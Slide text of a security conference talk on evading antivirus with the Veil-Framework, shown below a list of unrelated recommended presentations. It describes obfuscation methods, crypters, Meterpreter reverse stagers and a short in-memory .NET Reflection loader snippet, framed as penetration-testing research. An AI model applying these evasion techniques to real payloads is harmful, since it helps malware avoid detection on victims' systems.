Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...DianaGray10
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 

Recently uploaded (20)

Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
Connector Corner: Extending LLM automation use cases with UiPath GenAI connec...
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 

Adventures in Asymmetric Warfare

  • 1. Adventures in Asymmetric Warfare: Fighting the AV Vendors Will @harmj0y Veris Group - Adaptive Threat Division
  • 2. @harmj0y ● Security researcher and red teamer for the Adaptive Threat Division of Veris Group ● Co-founder of the Veil-Framework #avlol o www.veil-framework.com o Shmoocon ‘14: AV Evasion with the Veil Framework o Defcon ‘14: Veil-Pillage: Post-exploitation 2.0 o co-wrote Veil-Evasion, wrote Veil-Catapult, Veil- PowerView,Veil-Pillage, and PowerUp ● Active Cortana and PowerShell hacker
  • 3. tl;dr ● Problem Space ● How we got here and ethical issues ● Approaches #avlol ● Obfuscation methods ● Payload Analysis
  • 4. Teh Halting Problem? ● Input: o a potentially malicious program P ● Output: o True if executing P would cause a the host computer to be “compromised” o False otherwise ● def halts(P): return isMalicious(“removeMaliciousLogic(P) compromiseHost()”)
  • 5. Problem Space ● Anti-virus detection is an undecidable problem o That is, it’s impossible to design a 100% effective anti-virus solution ● Though a perfect approach is impossible, approximations can be made ● But detection is really really hard
  • 7. How We Got Here ● From 2009 on, antivirus started snarfing up more and more stock MSF payloads ● We started researching basic ways to keep doing our job ● All of our initial efforts drew from prior work, we don’t claim to have invented any of this stuff!!
  • 8. Previous Work ● Mark Baggett’s post Tips for Evading Anti- Virus During Pen Testing was the first public resource to talk about using Python to inject shellcode ● We ended up mostly drawing from Debasish Mandal's Execute ShellCode Using Python o Uses the VirtualAlloc/CreateThread/WaitForSingleObject pattern
  • 9. Our Solution ● A way to get around antivirus as easily as professional malware o don’t want to roll our own backdoor each time o codebase built by myself, @ChrisTruncer and @TheMightyShiv ● Generate payloads in a language and technique agnostic way ● See the Shmoocon ‘14 presentation AV Evasion with the Veil-Framework for more background
  • 11. Ethical Issues ● The disclosure debate is nothing new... ● Pentesters are 5+ years behind the professional malware community ● This is a problem the bad guys have already solved, and better than we have!
  • 12. Public Reaction “surely this will just result in 21 new signatures for all major AVs and then we're back to square one?” “Isn't our entire field meant to be working towards increasing security, rather than handing out fully functioning weapons?” “The other point here is that anything that helps to expose how in-effective AV really is at stopping even a minimally sophisticated attacker is a good thing.” http://www.reddit.com/r/netsec/comments/1fc2xp/veil_a_metasploit_payloa d_generator_for_bypassing/
  • 14. Approaches ● We started with Python based shellcode injection techniques, soon branched into other languages ● Similar payloads = : ( o started implementing basic obfuscation methods o and by basic, we mean basic ● static signatures = #avlol
  • 15. Obfuscation 1.0 ● Let’s randomize everything we possibly can o This works better than you think ● Substitute in a randomized string for all variable and method names ● Shuffle up everything as appropriate
  • 17. “Pyherion” ● What if vendors still find a way to trigger on the malicious Python script sources? ● We introduced Pyherion, a python ‘crypter’ inspired by Hyperion ● Encrypts an entire Python file with a random AES key, base64’s it and and rolls it all up into an exec(*) wrapper
  • 20. Obfuscation 1.5: Pure Stagers ● What if vendors are triggering on the raw shellcode and decoders? ● How about we eliminate shellcode all together, and build some native stagers? ● They aren’t that complicated, thanks Raffi! o https://github.com/rsmudge/metasploit-loader o http://blog.strategiccyber.com/2013/06/28/staged-payloads- what-pen-testers-should-know/
  • 21. Pure Stagers The meterpreter stager is surprisingly simple: 1) a tcp connection is opened to the handler 2) the handler spits back 4 bytes indicating the .dll size, and then the .dll itself 3) socket number is pushed into EDI 4) execution is passed to the .dll just like we do regular shellcode (void * or VirtualAlloc)
  • 22. Pure Stagers ● The following are the pure stagers currently available in the framework: Language Stager Python meterpreter/reverse_tcp Python meterpreter/reverse_http Python meterpreter/reverse_https C meterpreter/reverse_tcp C meterpreter/reverse_tcp_service C meterpreter/reverse_http C meterpreter/reverse_http_service
  • 23. Pure Stagers Language Stager C# meterpreter/reverse_tcp C# meterpreter/reverse_http C# meterpreter/reverse_https Powershell meterpreter/reverse_tcp Powershell meterpreter/reverse_http Powershell meterpreter/reverse_https Ruby meterpreter/reverse_tcp
  • 24. Obfuscation 2.0 ● Variable obfuscation is great ● But for things like C, this doesn’t work as well as we’d like ● Can we introduce something a little more interesting?
  • 25. Obfuscation 2.0 ● Our (slightly) more “advanced” C obfuscation involves our interpretation of a method nop o muck up dynamic analysis without affecting the actual execution of the program ● General idea: o throw in enough processing functions that sufficiently complicate the call tree of the program ● This is a basic version of what malware has been doing for years o shouldn’t be that effective, but it is!
  • 26. Obfuscation 2.0 ● Choose a set of randomized string processing functions (reverse, split, etc.) ● Malloc a randomized number of strings of randomized lengths ● Intersperse these randomized functions throughout the actual code
  • 28. Obfuscation 3.0 ● What if some vendors trigger on the Pyinstaller loader.exe itself? ● How about a (reasonably) obfuscated version of the Pyinstaller loader? :) o BSides Boston ‘14: Pwnstaller 1.0 o https://github.com/harmj0y/pwnstaller/ ● Integrated into Veil-Evasion this past May
  • 29. Pwnstaller ● On each run: o Obfuscated code for all* source files associated with the Pyinstaller launcher are generated o mingw32 is used to compile everything into a new runw.exe, all on Kali m/ o copy the runw.exe into the correct location o a randomized Windows icon is chosen for the final packaged result *see http://www.harmj0y.net/blog/python/pwnstaller-1-0/ for a full explanation
  • 30. Obfuscation 4.0: Ruby ● Since some people have started to pay attention to Pyinstaller binaries, let’s try some other languages: ● C? sure, with some obfuscation ● C#? mono can help with .NET ● PowerShell? no disk writes? awesome ● Ruby? Why not...
  • 31. Ruby ● Ruby has a foreign function interface just like Python does, the win32-api gem o This means we can inject shellcode, and can write native Meterpreter stagers! ● And it has its own Pyinstaller analogue: OCRA (One Click Ruby application) o http://ocra.rubyforge.org/ ● I wonder if we can get this running on Kali :)
  • 34. Ruby Module Releases ● The following payload modules are currently in the development branch, and will be merged into master for the 9/15/2014 V-Day: o ruby/shellcode_inject/flat o ruby/meterpreter/reverse_tcp ● Everything is compiled to a self-extracting Windows executable, all on Kali!
  • 35. A .NET Crypter ● C#/VB.net code is compiled, not interpreted, so we can’t build a dynamic obfuscator equivalent to Pyherion :( ● Or can we? .NET has an interesting feature called Reflection: o “you can use reflection to create type instances at run time, and to invoke and access them” http://msdn.microsoft.com/en-us/library/f7ykdhsy(v=vs.110).aspx
  • 36. A .NET Crypter ● If we have an array of raw bytes of a .NET binary, we can run the entire executable from memory with 3 lines by utilizing Reflection: o Assembly a = Assembly.Load(bytes); o MethodInfo m = a.EntryPoint; o m.Invoke(a.CreateInstance(m.Name), null); ● We can obfuscate these bytes in any way we want beforehand
  • 37. Arya: a .NET Crypter ● A crypter for all .NET binaries was just pushed along with the Ruby payloads ● A payload binary is generated and compiled as normal, the crypter then: o reads in the raw bytes o base64 encodes the data and builds a random substitution cipher for the string o builds a launcher/dropper that decodes the raw data and invokes the original binary using Reflection
  • 40. ssdeep ● ssdeep is a ‘fuzzy hashing’ static malware comparison tool, allowing for the comparison of malware families ● “can match inputs that have homologies” o biology term, fancy way to saying degree of shared ancestry ● Generated 1000 samples of some payload families did ssdeep runs over each set
  • 41. python/meterpreter/rev_tcp ● (1000 choose 2) = 499500 possible pairing combinations for ssdeep ● 169107 pairings (33.8%) matched at a score of 75/100 or better o Only 66 (.01%) scored at 90/100 or better o Average pairwise score: 74 ● What this means: only .01% of the samples scored as a ‘similar’ malware family
  • 43. c/meterpreter/rev_tcp ● Same 499500 possible pairings ● 267387 pairings (53.5%) matched at a score of 25/100 or better o Only 2615 (0.5%) scored at 90/100 or better o Average pairwise score: 37 ● What this means: only .5% of the samples scored as a ‘similar’ malware family o but wider variation than Python families
  • 45. cs/shellcode_inject/flat w/ Arya ● Same 499500 possible pairings ● Only 5 pairings (0.001%) matched at a score of 25/100 or better o none scored at 90/100 or better ● What this means: 0% of the samples scored as a ‘similar’ malware family o variation was all over the map!
  • 46. Recap ● Started our research out of necessity but continued it out of curiosity ● Fuxoring AV vendors really isn’t that difficult ● There are still ways to stop us :) ● #avlol
  • 47. Questions? ● Contact me: o @harmj0y o harmj0y@veil-framework.com ● Read more: o https://www.veil-framework.com ● Get the the goods: o https://www.github.com/Veil-Framework/Veil o https://github.com/HarmJ0y/stagers

Editor's Notes

  1. correct this?
  2. Kept burning time on limited-time engagements
  3. From this
  4. To this
  5. “Post up soon”
  6. “available with use_arya for all C#/VB.net modules”
  7. totally beta presentation, brainstorming...
  8. aka “context triggered piecewise hashes” ssdeep runs -> pairwise comparisons
  9. graph too small to show lol